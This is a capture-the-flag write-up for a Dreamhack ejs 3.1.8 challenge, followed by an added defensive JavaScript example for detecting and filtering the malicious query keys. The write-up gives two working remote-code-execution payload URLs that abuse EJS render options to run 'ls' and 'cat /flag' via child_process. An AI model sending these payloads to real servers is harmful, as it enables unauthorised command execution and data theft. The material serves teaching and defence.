
# \[Dreamhack] ejs\@3.1.8

{% embed url="<https://github.com/mde/ejs/issues/735>" %}

The payload is right there in the issue above. Modified for this challenge:

```
http://[assigned server address and port]/?name=John&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('ls');
```

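Solving the challenge just takes this modified payload.\
The PoC uses a Windows command, but the command has to run on the server, so build the payload with a Linux command instead; since this is an existing CVE, using it as-is gets a shell.\
\
Once you have confirmed that an error is thrown, a file is downloaded, and the shell is obtained, send: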

```
http://[assigned server address and port]/?name=John&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag');
```

This downloads the flag!

When the challenge was released this was a 0-day vulnerability, but over time it has become a 1-day vulnerability challenge.
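
From the defender's side, the request above only works if the parsed query object reaches the EJS render call unfiltered, so that the `settings[view options]` keys are read as render options instead of template variables. The following is an added example, not code from this writeup or from the EJS project: it assumes a route shaped like `res.render('index', req.query)`, and `flagSettingsKeys`, `pickTemplateData` and the sample values are hypothetical names and constructed inputs.

```javascript
// Added example (not from the writeup or the EJS project).
// Assumption: the vulnerable route does res.render('index', req.query).

// Top-level name of a bracketed query key:
// "settings[view options][client]" -> "settings".
function topLevelKey(rawKey) {
  const i = rawKey.indexOf('[');
  return i === -1 ? rawKey : rawKey.slice(0, i);
}

// Detection: return the raw query keys that reach into the `settings`
// object, which a template variable never needs to do.
function flagSettingsKeys(requestUrl) {
  const params = new URL(requestUrl).searchParams; // keys come back percent-decoded
  const hits = [];
  for (const key of params.keys()) {
    if (topLevelKey(key) === 'settings') hits.push(key);
  }
  return hits;
}

// Mitigation: build the render data from an allowlist of plain string fields,
// so nested objects and unexpected keys never reach the template engine.
function pickTemplateData(query, allowedFields) {
  const data = {};
  for (const field of allowedFields) {
    const own = Object.prototype.hasOwnProperty.call(query, field);
    if (own && typeof query[field] === 'string') data[field] = query[field];
  }
  return data;
}

// Constructed samples; the option value is a harmless placeholder.
const SAMPLE_URL = 'http://ctf.example:8000/?name=John' +
  '&settings[view options][client]=true' +
  '&settings[view options][escapeFunction]=CONSTRUCTED_VALUE';
const SAMPLE_QUERY = { // shape a nested (qs-style) query parser produces
  name: 'John',
  settings: { 'view options': { client: 'true', escapeFunction: 'CONSTRUCTED_VALUE' } },
};

console.log(flagSettingsKeys(SAMPLE_URL));
console.log(pickTemplateData(SAMPLE_QUERY, ['name']));
// In the route (hypothetical): res.render('index', pickTemplateData(req.query, ['name']));
```
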

